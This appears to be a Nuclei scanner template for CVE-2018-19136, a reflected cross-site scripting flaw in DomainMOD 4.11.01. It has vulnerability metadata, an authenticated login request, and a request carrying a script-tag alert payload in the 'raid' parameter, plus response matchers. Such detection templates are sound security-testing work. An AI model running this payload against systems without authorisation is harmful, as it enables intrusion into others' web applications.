id: CVE-2018-19136 info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45883/ - https://github.com/domainmod/domainmod/issues/79 - https://nvd.nist.gov/vuln/detail/CVE-2018-19136 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 epss-score: 0.00152 epss-percentile: 0.50531 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: domainmod product: domainmod tags: cve2018,cve,edb,domainmod,xss,authenticated http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - | GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '">&really_del=1">YES' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502202aa2d37d93090e65caa5149dce628a5f34aaf844a03795a60118487af86ad41a022100948b4dfb7fbc394901fe1405320714bc046f960c82c84e7dd65bfd91b4001a31:922c64590222798bb761d5b6d8e72950